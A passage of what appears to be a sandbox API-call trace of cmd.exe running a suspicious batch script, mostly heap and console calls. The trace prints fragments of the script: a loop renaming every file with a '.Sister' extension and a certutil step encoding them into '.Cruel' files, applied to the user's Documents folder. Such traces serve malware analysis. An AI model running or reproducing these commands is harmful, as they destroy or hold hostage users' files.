BaseAddress=0x21ed9375630) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93756f0) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d34fd0) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.552] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d34f90) returned 1 [0306.552] GetProcessHeap () returned 0x21ed8c70000 [0306.553] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93757b0) returned 1 [0306.553] GetProcessHeap () returned 0x21ed8c70000 [0306.553] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc70c0) returned 1 [0306.553] GetProcessHeap () returned 0x21ed8c70000 [0306.553] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed936ffe0) returned 1 [0306.553] GetProcessHeap () returned 0x21ed8c70000 [0306.553] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93d6b90) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9371ab0) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7720) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63fc0) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67730) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63f50) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8a10) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d34e20) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d34de0) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d34b40) returned 1 [0306.555] GetProcessHeap () returned 0x21ed8c70000 [0306.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8c50) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d349d0) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d34990) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9372470) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93c6ba0) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93704c0) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7f00) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2c690) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2de50) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2e0d0) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d676b0) returned 1 [0306.556] GetProcessHeap () returned 0x21ed8c70000 [0306.556] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b6930) returned 1 [0306.615] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.615] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x37c [0306.615] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x181, lpOverlapped=0x0) returned 1 [0306.615] SetFilePointer (in: hFile=0x3c, lDistanceToMove=894, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x37e [0306.615] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0306.615] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.616] GetFileType (hFile=0x3c) returned 0x1 [0306.616] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.616] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x37e [0306.616] GetProcessHeap () returned 0x21ed8c70000 [0306.616] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0306.616] GetProcessHeap () returned 0x21ed8c70000 [0306.616] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0306.616] _tell (_FileHandle=3) returned 894 [0306.617] _close (_FileHandle=3) returned 0 [0306.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0306.618] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0306.618] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.618] SetFilePointer (in: hFile=0x3c, lDistanceToMove=894, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x37e [0306.618] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.618] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x37e [0306.618] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x17f, lpOverlapped=0x0) returned 1 [0306.618] SetFilePointer (in: hFile=0x3c, lDistanceToMove=958, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3be [0306.618] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=64, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 64 [0306.618] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.618] GetFileType (hFile=0x3c) returned 0x1 [0306.618] _get_osfhandle (_FileHandle=3) returned 0x3c [0306.618] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3be [0306.619] GetProcessHeap () returned 0x21ed8c70000 [0306.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0306.619] GetProcessHeap () returned 0x21ed8c70000 [0306.619] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0306.619] _wcsicmp (_String1="for", _String2=")") returned 61 [0306.619] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0306.619] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0306.619] GetProcessHeap () returned 0x21ed8c70000 [0306.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c967c0 [0306.619] GetProcessHeap () returned 0x21ed8c70000 [0306.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7ce20 [0306.619] GetProcessHeap () returned 0x21ed8c70000 [0306.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45e90 [0306.619] GetProcessHeap () returned 0x21ed8c70000 [0306.619] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e90, Size=0x18) returned 0x21ed8c95560 [0306.619] GetProcessHeap () returned 0x21ed8c70000 [0306.620] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95560) returned 0x18 [0306.620] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0306.620] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0306.620] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0306.620] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0306.620] _wcsicmp (_String1="IN", _String2="in") returned 0 [0306.620] GetProcessHeap () returned 0x21ed8c70000 [0306.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45d10 [0306.620] _wcsicmp (_String1="DO", _String2="do") returned 0 [0306.620] _wcsicmp (_String1="certutil", _String2=")") returned 58 [0306.620] _wcsicmp (_String1="FOR", _String2="certutil") returned 3 [0306.620] _wcsicmp (_String1="FOR/?", _String2="certutil") returned 3 [0306.620] _wcsicmp (_String1="IF", _String2="certutil") returned 6 [0306.620] _wcsicmp (_String1="IF/?", _String2="certutil") returned 6 [0306.620] _wcsicmp (_String1="REM", _String2="certutil") returned 15 [0306.620] _wcsicmp (_String1="REM/?", _String2="certutil") returned 15 [0306.620] GetProcessHeap () returned 0x21ed8c70000 [0306.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96040 [0306.621] GetProcessHeap () returned 0x21ed8c70000 [0306.621] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45e30 [0306.621] GetProcessHeap () returned 0x21ed8c70000 [0306.621] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bb20 [0306.621] _tell (_FileHandle=3) returned 958 [0306.621] _close (_FileHandle=3) returned 0 [0306.621] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0306.621] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.621] GetFileType (hFile=0x50) returned 0x2 [0306.621] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.621] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0306.622] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.622] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0306.629] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.630] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.630] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0306.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.630] GetFileType (hFile=0x50) returned 0x2 [0306.630] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.630] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0306.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.630] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x1a) returned 1 [0306.631] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0306.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.631] GetFileType (hFile=0x50) returned 0x2 [0306.631] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.631] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0306.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.632] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0306.632] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0306.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.632] GetFileType (hFile=0x50) returned 0x2 [0306.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.633] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0306.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.634] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0306.634] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*.Sister) do ") returned 14 [0306.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.635] GetFileType (hFile=0x50) returned 0x2 [0306.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.635] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0306.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.635] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0xe) returned 1 [0306.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.636] GetFileType (hFile=0x50) returned 0x2 [0306.636] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.636] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0306.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.636] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d45e40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8d45e40*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x8) returned 1 [0306.637] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" -encode \"%~a\" \"%~na.Cruel\" ") returned 28 [0306.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.637] GetFileType (hFile=0x50) returned 0x2 [0306.637] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.637] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0306.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.637] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1c) returned 1 [0306.638] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0306.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.638] GetFileType (hFile=0x50) returned 0x2 [0306.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.638] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0306.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.638] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0306.645] malloc (_Size=0xffce) returned 0x21ed8e90940 [0306.645] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0306.645] GetProcessHeap () returned 0x21ed8c70000 [0306.645] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7c9a0 [0306.646] GetProcessHeap () returned 0x21ed8c70000 [0306.646] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95ac0 [0306.646] GetProcessHeap () returned 0x21ed8c70000 [0306.646] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c958c0 [0306.646] GetProcessHeap () returned 0x21ed8c70000 [0306.646] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8910 [0306.646] GetProcessHeap () returned 0x21ed8c70000 [0306.646] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8910, Size=0x24) returned 0x21ed8d45bc0 [0306.646] GetProcessHeap () returned 0x21ed8c70000 [0306.646] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45bc0) returned 0x24 [0306.646] GetProcessHeap () returned 0x21ed8c70000 [0306.646] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45b30 [0306.646] FindFirstFileExW (in: lpFileName="*.Sister", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7cac0 [0306.647] GetProcessHeap () returned 0x21ed8c70000 [0306.647] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d32140 [0306.647] _wcsicmp (_String1="*.Sister", _String2=".") returned -4 [0306.647] _wcsicmp (_String1="*.Sister", _String2="..") returned -4 [0306.647] GetFileAttributesW (lpFileName="*.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\*.sister")) returned 0xffffffff [0306.647] GetLastError () returned 0x7b [0306.647] GetProcessHeap () returned 0x21ed8c70000 [0306.647] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45e90 [0306.647] GetProcessHeap () returned 0x21ed8c70000 [0306.647] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e90, Size=0x60) returned 0x21ed8c75e40 [0306.647] GetProcessHeap () returned 0x21ed8c70000 [0306.647] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75e40) returned 0x60 [0306.647] GetProcessHeap () returned 0x21ed8c70000 [0306.647] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0306.647] GetProcessHeap () returned 0x21ed8c70000 [0306.648] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32630, Size=0x58) returned 0x21ed8d32630 [0306.648] GetProcessHeap () returned 0x21ed8c70000 [0306.648] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32630) returned 0x58 [0306.648] GetProcessHeap () returned 0x21ed8c70000 [0306.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d326a0 [0306.648] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.648] GetProcessHeap () returned 0x21ed8c70000 [0306.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x50) returned 0x21ed8c7ce80 [0306.648] ??_V@YAXPEAX@Z () returned 0x1 [0306.648] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.648] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa54f164d, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cd00 [0306.648] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0306.649] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa54f164d, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0306.649] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0306.649] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe14617fb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe14617fb, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa54f164d, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7cfa0 [0306.649] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0306.650] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0306.650] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\0H3WME_tqNVE6XV UFW.docx.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c20e9d0, ftCreationTime.dwHighDateTime=0x1d5dd58, ftLastAccessTime.dwLowDateTime=0x51e00a80, ftLastAccessTime.dwHighDateTime=0x1d5859b, ftLastWriteTime.dwLowDateTime=0x51e00a80, ftLastWriteTime.dwHighDateTime=0x1d5859b, nFileSizeHigh=0x0, nFileSizeLow=0xd540, dwReserved0=0xa54f164d, dwReserved1=0x0, cFileName="0H3WME_tqNVE6XV UFW.docx.Sister", cAlternateFileName="0H3WME~1.SIS")) returned 0x21ed8c7cee0 [0306.650] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0306.650] _wcsnicmp (_String1="0H3WME~1.SIS", _String2="0H3WME_tqNVE6XV UFW.docx.Sister", _MaxCount=0x1f) returned 31 [0306.650] malloc (_Size=0x1ff9c) returned 0x21eda3bfa80 [0306.651] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0306.652] GetProcessHeap () returned 0x21ed8c70000 [0306.652] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bfd0 [0306.652] ??_V@YAXPEAX@Z () returned 0x1 [0306.652] ??_V@YAXPEAX@Z () returned 0x1 [0306.652] GetProcessHeap () returned 0x21ed8c70000 [0306.652] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d326a0, Size=0x270) returned 0x21ed8d326a0 [0306.652] GetProcessHeap () returned 0x21ed8c70000 [0306.652] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d326a0) returned 0x270 [0306.652] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0306.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.654] GetFileType (hFile=0x50) returned 0x2 [0306.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.654] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0306.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.654] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0306.661] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.662] _vsnwprintf (in: _Buffer=0x21ed8e80160, 